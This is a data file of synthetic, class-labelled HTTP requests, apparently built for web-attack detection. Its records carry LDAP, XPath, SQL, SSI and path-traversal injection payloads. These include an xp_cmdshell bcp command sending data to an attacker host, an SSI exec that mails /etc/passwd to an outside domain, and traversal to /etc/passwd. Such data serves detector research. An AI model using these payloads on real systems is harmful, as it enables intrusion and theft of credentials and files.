GET /rzhMa3n5ea/nMVvp__5hsXNT/ekrdTz/trDs/o-RjJC@dQ/imt6b0nendglo/unteMiqo7khbEUtclrc/coIonsB3Mfunn42/ltv7QfODufcY.png?alr8eeaitIgete=rwsnjJTWca5leht&ios=se&mEceAhde=oO98WPK&ih7g=6652269&esien=lriai4retwysnftp&zz5L3SUowW9Y=%29+%28++++%7C++++%28vcl%3DE1T*%29 HTTP/1.0
Host: 150.95.178.189
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: cn8uetor-m5;q=0.8, sa-cei;q=0.5, 0Sheks-rv, iYqh6l2-otmdA
Cache-Control: min-fresh=589
Client-ip: 68.144.9.61
Cookie: tiuaa=g doeteto
Cookie2: $Version="988"
Date: Sat, 01 Jan 05 16:00:10 UTC
ETag: "yzFFwi2xkZtkbQro8al"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Tue, 27 Feb 07 22:02:24 CET
If-Unmodified-Since: Thu, 12 Feb 09 09:14:55 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Wed, 24 May 06 20:44:07 UTC
Max-Forwards: 0508
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM b252ZXUxdWlpY3l1YXVkbHVoNGxlc2htYW1BaG4ybnJa
Authorization: ffwo gostPoe8=llnctoy
Range: 478-6,9746-59,-9293
Referer: /dhui3/jvrrtban/snet.msf
TE: trailers
Trailer: Upgrade
User-Agent: w08nerhy (aV8fUFAhBR; b7X1cz)
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: AoOi3; hapenhoa=tnbt
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37925
Start - Id: 37183
class: LdapInjection
GET /ilvnLeKSH@A@_9n/1egtmykha03/jKeks/hT2W6NnYKN1D/@jXyh0KX2/aeGrOn/cydQD/dlbj7zbYWn/w7.cgi?aeOnLhEfva=%29++%28+++%7C+%28++++cn%3D*o%27brien*+%29%28mail+++%3D*o+++%27brien*+%29+&ssmAjndozS0eaa=or&emejitknnkvxn=02699522&dabjegi=16&UW=a%3Dat&p23Hunrhzsels=tabhgutnbfih9f&scienntd=7889807 HTTP/1.1
Host: www.atiknnat.org
Connection: keep-alive
Accept: video/mpeg;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=8502
Client-ip: 70.71.99.38
Cookie: stlyj=h3e5PIKLc9M;le=216975;scriptOJqnetcatYo76=ooWnbto
Cookie2: $Version="2"
Date: Tue, 08 Apr 08 16:03:40 UTC
If-Modified-Since: Sat, 30 Jul 05 07:02:39 CET
If-Unmodified-Since: Mon, 12 Dec 05 02:39:31 UTC
If-Match: *
If-None-Match: "woazcFfJzIrezx8cs"
If-Range: Thu, 01 Jul 04 13:40:51 GMT
Max-Forwards: 9175
Authorization: iai0nd 4nyszpea=dnbr
Range: 3034-,-678,-3
Referer: http://Onfhr.gov/al4gE8r5/2hxiio/edvlen/ame1hmq.jsp
TE: chunked
User-Agent: Mozilla/0.4 (X11; U; SunOS sun4u 3.9; 1o-ur; rv:8.3.6) Gecko/34770653
Via: FTP/2.1 www.bezcie.gif
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37183
Start - Id: 41110
class: SqlInjection
GET /b9Oautoexec73B/q2.yhPbmam6g2DKPM/l.Z/sl6EtoeRuaaojv/urob/nTE_@U@QQ0MUlZ/uS6o8OZqnxySjF/ZwVvH1IHD/yfRtss/oDtfNikA8lamtotto/@ADA.mspx?tKoec=exec+xp_cmdshell++%27bcp+++%22select++*+from+++++6p%22++queryout+++pwdump.exe++++-c+++++-Craw++++-Shackersip++-Usa+++-Ph8ck3r%27&6systemtbcw=t1AHiuc&ehctuelNE=rgoeOsWN_ HTTP/1.1
Host: 42.233.44.156
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: mnzW='aH3m2Iep'
Client-ip: 190.211.91.23
Cookie: ho=32;sduip=huupdtpi
Cookie2: $Version="75"
Date: Fri, 13 Jul 07 21:50:08 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Tue, 21 Nov 06 23:51:28 CET
If-Match: *
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 67
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: NTLM YWVyZW91YWVwbW9Ub250b3RpOWZodHNkb2RyZWk3czN3YWExY21hRmVOYWJO
Range: -397
Referer: /dcfhen/ssasgreu/splShelc/s5iuaaaf.wav
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 8.9; hA-l7; rv:9.4.9) Gecko/55133883
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.8 237.8.7.43
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: 9aoiri/7.1, i3fsg/8.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 50.70.237.114
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41110
Start - Id: 39824
class: SSI
GET /6azlewemtihdud/sk8vU/tMS3ZNfBXZEmTX0/burdmnf7A/0SehTeli0.jpg?wrnre=20134274&Itelnetq_J9m=sotnewe&5msfArHhdiy9ib=566469&ee3nFvehN8me=%3C%21--%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&w0FDQ2htTzE-=0%3Drp1tg2nph-io&sdNhasaerycre=nd%40&dRcjdfgeinul3=%3DnBw HTTP/1.1
Host: www.dlniBc.it
Connection: close
Accept: image/jpeg, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: iaru-t668e, ep5tssaf-1eemoae, i5-oeeii;q=0.9
Cache-Control: no-transform
Client-ip: 155.64.17.53
Cookie: 2edineooy=bodyrcoscriptalels@Om;1Dgy=46;vTul1r=da;q3IMGuunionLCS=6850;doh1CdTA=t:dj positionU[fmail
Cookie2: $Version="15"
Date: Thu, 21 Dec 06 21:52:27 GMT
ETag: "1g_YhGJQjL63vJ@"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sat, 08 Jan 05 23:16:06 GMT
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Feb 06 11:29:02 UTC
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 2823-938,404128-
Referer: http://eSiolofo.cz/tiehanin/8ocjrarr/8Ctzmd/6uiaoeyt/xa6xne.jsp
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 7.3; Nn-m1; rv:3.7.5) Gecko/64041346
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: HTTP/3.8 203.110.249.170:0
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 236 www.per1iyt.gif "ivlawmebhs44spsee" "Sun, 20 Sep 09 12:22:58 GMT"
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39824
Start - Id: 35708
class: XPathInjection
GET /Unheieadt7gsvhs/QELMD/sSX5A79/eunoohamrprhpErOhne/g4oM6lhBl7TiewjC/rjvnrloqriooa/@fzuTE/asneossfe0atnboz/ohbznf1N9q6/rneathhhcyXhtg5l5/uxoYs.asp?vtsm8L=wtrf%27++++or+++1%3C++hotzny%2Fot3%2Fsssl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D87%5D+++or+++++%27boEi%27++%3D+%27&em7Xfien3izn=iseon%3Cybodyathb&5trf=94&7V0includeVhPSVW@=sjte0sclfrn8psh&FOxlpX6psqTup=t%2Fscriptrjiutl7%7Cam9o HTTP/1.1
Host: www.hyuo.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tlk2in-2m9lw
Cache-Control: max-stale
Client-ip: 144.129.84.108
Cookie: hs7O4TidlthdeAT=iSwh>o;sk3t7t=9451463859;nhstslite=3Bl7Dd5.pur
Cookie2: $Version="35"
Date: Sun, 24 Sep 06 05:27:24 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Sat, 19 Feb 05 10:10:57 GMT
If-Unmodified-Since: Wed, 22 Feb 06 06:42:10 GMT
If-Match: "6rbTgf_XY9KDDxd"
If-None-Match: *
If-Range: Thu, 04 Aug 05 06:13:09 UTC
Max-Forwards: 7481
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Digest cnonce="N2rrnfo"
Authorization: Basic ZWRzeFRpaGI6dHNybWlw
Range: 5225-,8-9,1-
Referer: /enu6o/eeyniiE/w8ie.sh
TE: trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/4.8 (compatible; Konqueror/6.9; Open BSD i386; jheoeRp; zoethkdKug)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 656x763
Via: 7.5 134.234.107.240, 9.4 www.rhjx.shtml
Transfer-Encoding: identity
Upgrade: acPhne/6.3, xettw/7.0
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35708
Start - Id: 48517
class: XPathInjection
PUT /etcWwl_1accept4.css? HTTP/1.1
Content-Length: 157
Content-Language: nhl8,e5tdyfsE
Content-Encoding: identity
Content-Location: /ttew8egr/teke/n9hljLon/ewyi0l.avi
Content-MD5: ZWlhZWh0RWZzOEV0aWROaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Sat, 23 Feb 08 21:08:53 GMT
Host: www.miMls.it:702
Connection: close
Accept: */*
Accept-Charset: us-ascii, utf-7;q=0.0, ks_c_5601-1987, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=28
Client-ip: 171.224.239.130
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="407"
Date: Fri, 24 Jul 09 01:11:50 UTC
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Sat, 12 Jul 08 15:43:42 CET
If-Unmodified-Since: Thu, 28 Feb 08 02:44:04 GMT
If-Match: *
If-None-Match: "CRF7bM-U7NLhH0jfaJvj"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 78
MIME-Version: 6.8
Pragma: eOd='Sg'
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: /toyr2b/I2smg/cnAH/trwFon.rar
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Charset
User-Agent: o4air/7.7.5
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 6365x946
Via: 7.2 www.apdmso.js:3977, HTTP/4.7 21.124.98.59, 7.7 135.74.148.245
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eMwLL5H=rhduzje'  or     lSa/9dei/child::node()[processing-instruction()=4]   or    'den3aidl'    =    '&anlSnd=mgtdieneDifem

End - Id: 48517
Start - Id: 46394
class: PathTransversal
GET /id0azTdshrrSrt/Oa/e1du_IxWJN7X2bs/euQuC6/oE/pc..jpg?etm3nCi0mppcIi=ebu&OkaAPs=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&9NuXXsystemCzZ_8-=%3Bwnsapositionb&DoFo6=0787 HTTP/1.0
Host: www.zEatnot.fr
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 23.79.216.68
Cookie: sliseeja7giaewa=Ted;95NVnL0NfV6=a;i4fgs9Som1pmya=edAn;nAhreskni=m5R7v;GcxD=c ;pIitSaU=nzrp
Cookie2: $Version="7"
Date: Thu, 10 Jul 08 09:58:21 GMT
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 24 Mar 08 15:47:04 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Sat, 26 Dec 09 13:58:52 CET
Max-Forwards: 667
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Basic UjNheDppb213dGU=
Range: 0-,-1441,-234089
Referer: http://sh4rUo.uk/dini/steelut/eas4rst/renesdm.php3
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Charset
User-Agent: foeilb8/7.9.9
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 7.0 137.126.180.196, FTP/0.8 32.21.102.60, HTTP/6.5 86.109.106.145
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 188.93.207.249
X-Serial-Number: 75398657
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46394
Start - Id: 37816
class: LdapInjection
GET /lbwlTh@3Mt-r4/pQ/t.S0AQMha/obJsFU7Y3Hd911e/muarEjeodj/PTBO/rFdqZDcdjp8qYV/oc3Detrl/tb6noTeox/h5OtaEd/lq/ep79fIfP.bin?L6gUhtpassCxV7=94655&cix=ogdocumenttmp&3ettsri=nCjnEjVZ.&nettseOc=14441&rulhnrnw=aSse%29%28%26%28objectClass+%3D++++hgmr*%29&hL3m=0040402 HTTP/1.1
Host: 182.48.125.135:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-7;q=0.1, x-mac-japanese;q=0.3, x-mac-turkish, iso-8859-1
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 76.169.84.54
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="625"
Date: Sun, 08 Feb 04 02:33:00 UTC
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: soee=rrillw0;tfrta=vHins
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Mon, 28 Dec 09 06:09:14 CET
If-Unmodified-Since: Thu, 19 Aug 04 03:33:24 CET
If-Match: "qZnicOCs84eIQrEPHP"
If-None-Match: "qdSIMPkMcHTsIBu"
If-Range: "byFR7tB7h29iTBYw"
Max-Forwards: 7696
MIME-Version: 0.8
Pragma: C0=n7dsDnm
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: /ddtein.gif
TE: deflate;q=0.2,chunked
Trailer: If-Range
User-Agent: Mozilla/8.0 (compatible; sonhos; Linux i586; t5HevnLAem)
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.1 www.lineeNg.htm, 2.6 www.ieeznco.js:7
Transfer-Encoding: gzip
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37816
Start - Id: 49443
class: XPathInjection
GET /l7/aeirinmet2esqeibf/rlrrapntfuecTQr/fsovudkoeLlcShso/rG/rXrQVBP_cbiqP/_ZD5/jQ4/eEMiO.pl?tewod9Anyoji=trisenN0aponl&gecnisg=ereudh2eis&rzAUw6scriptfoGXV=i+utqccihi&o0tut=oB&ioobmrethyu=%24elebem&slonyi=eYqNJt&igen=bsyrdfi&hlas=06&leaysaisro6o=icRBlkGbA&btG0Y93qgetEsos=eeRn1OaaeTfsed&2ihhitRs=143293630&en=R%25e%2Bdhmiwc7yl%3Do%3C&ngnT8oete=itinwi9%27+++++or++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i+%2B+j+++%2B++++k%2B+++l++++%2B++++1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++%27ei5%27++++%3D++++%27+++++oc9Ues8n%27+or&Tirhv=85167 HTTP/1.0
Host: 154.28.181.158
Connection: close
Accept: */*
Accept-Charset: euc-cn, windows-1254;q=0.8, koi8, us-ascii;q=0.2, iso-8859-7
Accept-Encoding: 
Accept-Language: koeLa-s, hdmzh-ayIsc, naew4am-bimt;q=0.4, pt9tin-rint8sue;q=0.2
Cache-Control: no-transform
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="10"
Date: Fri, 15 Jan 10 06:54:50 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 08 Feb 08 11:02:13 GMT
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: "3IQ6M6pQpeWK3tSl5QSQ"
If-None-Match: "RLZiUwFUpGCRBZk7apkN"
If-Range: *
Max-Forwards: 238
MIME-Version: 6.9
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 80-08008,86-2,0-
Referer: /ae5u8tt/ta9msn/vkseniip/oienwqwA.shtml
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 6.1; lp-l9; rv:7.8.1) Gecko/99075725
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: 4.8 119.207.122.125, 5.5 www.8iftnhfa.gif
Transfer-Encoding: deflate
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49443
Start - Id: 37916
class: LdapInjection
GET /r904GZJFCPzSanR_S/vlYL0_sqGF2/1mngriHa/mB0uTsf0-/HiyEnVjffromXm3/rV7vDxz/eteope8ahnnia/8QC7o4_gbhf1vqnzE/ldhRht/6xitpsutyneglcue.png?oNoJ49xF78-G=%29+++%28%7C+++%283syi9%3Dgyj*%29&aaho=9215787&droptmpwxml=%25%25g%263Tnph-sqxterm+r+vtWOtrs&ecnmsufddf=5742700&ezrgmoteeSlAt=65502177 HTTP/1.1
Host: www.snhsnrzT.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: eltahm2-1ea;q=0.4, Treee8It-tE3tt, t4e-ooilazlr;q=0.8, rPeneIe4-womuN;q=0.8
Cache-Control: no-transform
Client-ip: 206.217.112.201
Cookie: msmntE=Deolm8Et
Cookie2: $Version="988"
Date: Sat, 27 Jun 09 08:27:59 UTC
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: 100-continue
From: dshas@enehfts.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Thu, 29 Nov 07 05:11:09 GMT
If-Match: "uuHYBF9HrpVmuPl"
If-None-Match: *
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 29
MIME-Version: 7.8
Pragma: Pns=n0dySecy
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: Basic YmRyYzpubGJlQ2IwZQ==
Range: 462856-56111,-65
Referer: http://www.ah68.be/sLnoi/rTnhnr/in6ia/4ee4/tm3drf.mspx
TE: trailers,trailers
Trailer: Host
User-Agent: tspnEue0keoakyefswf
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: idode; 2uroj=S05Aid
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37916
Start - Id: 37929
class: LdapInjection
GET /bneea9qtrbEsitheb6eo/a95XzrQllENC/FaWM.S3TFjzZPs4/YE/aIDx4sWGvz0JTZy5P5/oN-dHTFv9.tiff?esogsiUaiiao=tFT2LW&ndEr6stya=93701&Rri6ufNshpNcp=Hcoh&datEcups=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Sto=erswa HTTP/1.0
Host: www.sssbpeBie.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: rtIUYsiz-1eseyam, illst-9df;q=0.2, kerRioa5-qo7t, noayE6io-fdfDut;q=0.2
Cache-Control: max-age=3
Client-ip: 101.129.127.238
Cookie: FCtmpHM=trstmpebi6eicee;sGsHi5hlneqia7n=905;tiAeouiueg207=48409;wldt5odmso2s=>enjtltnaccess_logC0aIjor?etdo
Cookie2: $Version="624"
Date: Tue, 21 Dec 04 15:06:07 CET
ETag: ".f1L-BJqvrt895Cg"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Wed, 11 Aug 04 10:11:15 CET
If-Unmodified-Since: Tue, 14 Sep 04 04:27:27 CET
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 83
MIME-Version: 8.6
Pragma: oaNmhre=cUn
Proxy-Authorization: Basic VWFjaDp3YXls
Authorization: Exrh yauloeig=oilepn
Range: 92-
Referer: /ozthIE/AthiN.dll
TE: trailers
Trailer: Upgrade
User-Agent: at0atyeheoooa7vrk
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: FTP/2.7 47.86.111.179
Transfer-Encoding: PChnah; hsgbn=0e6cb
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37929
Start - Id: 48451
class: XPathInjection
GET /rlDcvhz/i.K_p2or0G.js?78nKateqaD=075492963&ynlYbmcoriemH=tsads1&7einansdgpdhgA=610 HTTP/1.0
Host: www.egroe.com
Connection: close
Accept: application/*;q=0.4, text/html;q=0.3
Accept-Charset: *
Cookie: ESsle=71;Hb8.R=herzxmEsnTl;objnOa=rt'    or   count(   path/child::node()[position(    )=(( i   +j    +    k    +  l  +    1)]   |  path/child::*()[position()=(k+1)])=1 or   'hv' = '  itnn'  or
Date: Sat, 13 Aug 05 14:49:25 GMT
ETag: W/"_ELKnf_CcQeWr_tBoB"
From: eneaubeo@rwfp2t.be
If-Unmodified-Since: Thu, 29 Sep 05 14:07:36 CET
If-Match: *
Referer: http://www.esA6r.fr/aphgdA6/boe6Ome2.css
User-Agent: Mozilla/5.2 (compatible; Konqueror/2.3; Open BSD i586; e0pI; dwovp; 23ases7yl)
Via: FTP/2.5 120.57.209.183

null

End - Id: 48451
Start - Id: 37096
class: LdapInjection
GET /rO/2BTcW9stdinOtmpP@/4rNSY/i4b6X5_G-ZBU/hYW7IL4ch0o-S/lWuRZbJgosaNKu4P/rBXmNwVWic2F.jpeg?ethhtdtOt4shoin=6575%29%28%26%28objectClass%3DlO1%29%28%7C%28sn++++%3D++oN%29%28cn%3DtA+++J*%29%29&ttgi=mi+ousTte&9knph-nMT4n=5534704&drwesteA=2&xp_btE=erfaxehaccess_logEers9%24&vtattEat=02&o7nsgtrs9ryi=zaurd7e4I&l0pOng=cdeNeeustcr0 HTTP/1.1
Host: 246.38.99.127:6
Connection: eeeoats7
Accept: video/*, video/*;q=0.4, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 251.109.116.77
Cookie: ano=s1io;teeewt1Dh7tee=6;lnC5=9
Cookie2: $Version="020"
Date: Sat, 23 Dec 06 13:22:08 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: psotr
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Sun, 09 Jul 06 12:31:02 GMT
If-Match: "vqvFvd-kwWFOLqK"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.7
Pragma: rdrhi=ne4ril
Proxy-Authorization: NTLM dWhtaWVpa29hZHRzbzh3bGlrc3pIdU41eGxpdmFoSDRhYWVsbnM0dQ==
Authorization: Digest uri=http://www.ieofy.fr/etne9/oL1A/s0oe.cfm
Range: 8-29969,-67,432-912142
Referer: /WuaHted/ngE3.cfm
TE: trailers
Trailer: Max-Forwards
User-Agent: epar0Dh
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: ytHgo; ethv=mSnao
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37096
Start - Id: 39874
class: SSI
GET /_node3YAkSSpsTAru/iaw6oerWertlt/38location%unodezQDEUxtermy/6OHUnBGeI/pkDiJ7A/tTXV_rR/eR.css?ae=7inputoeiaxotn&nnI08thtaHaE9e=atwh+uidtht&o9iTcj=%26Ri&bEHqQincludeM=0dviluam&EdtsttnidThese=alleqe57enlxw+eho HTTP/1.1
Host: www.o0rrediet.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: <!--#exec cmd="/bin/mail   nieelm.com   <   /etc/passwd"-->
Accept-Language: *
Cache-Control: no-cache
Date: Sat, 30 May 09 19:55:01 UTC
Expect: 100-continue
If-Unmodified-Since: Mon, 12 Jan 04 07:28:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 17
MIME-Version: 1.0
Authorization: snkc Mgtgdo=olmd
Referer: http://de1tiycb.de/n6msq9bm.png
User-Agent: rv1nP3AMl http://www.etspEtin.be
UA-Color: color16
Via: 2.6 www.bossio.png, HTTP/6.4 150.5.223.67
Upgrade: ehegr/0.3

null

End - Id: 39874
Start - Id: 49546
class: XPathInjection
GET /ctseduPlethh4hra/stgicteu/OYm4/w92uweor.php?tontD=eu&MBctmp=eetyoialhrespNrm&iiiRoed=4dr&wdtfertsie9don=yn0iiu%27+++or+hefdeT%2FkesUml%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D4%5D++or+++++%27aneawhF%27+%3D%27&samenLCy1lXG2Q=+mo7%28hC%404usnnmie7emn&P5xjy=e&olone7me=r%40CiOsarcpo%5Db+%5Dnr+eaps&sobsce=9859&houdgO=91&YT3KQcl=w&St60hiln8abssl=t6g&xueteOst2y=826&winntGpWs5=Qs%3Feiir3m%3D&uLN4suJsX=qwseS&OfaOear=n4sd4u HTTP/1.1
Host: www.ivH0.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, ks_c_5601-1987, x-mac-roman
Accept-Encoding: identity;q=0.6, identity;q=0.1, identity
Accept-Language: epeu-cyvpoe, qerlmn-st
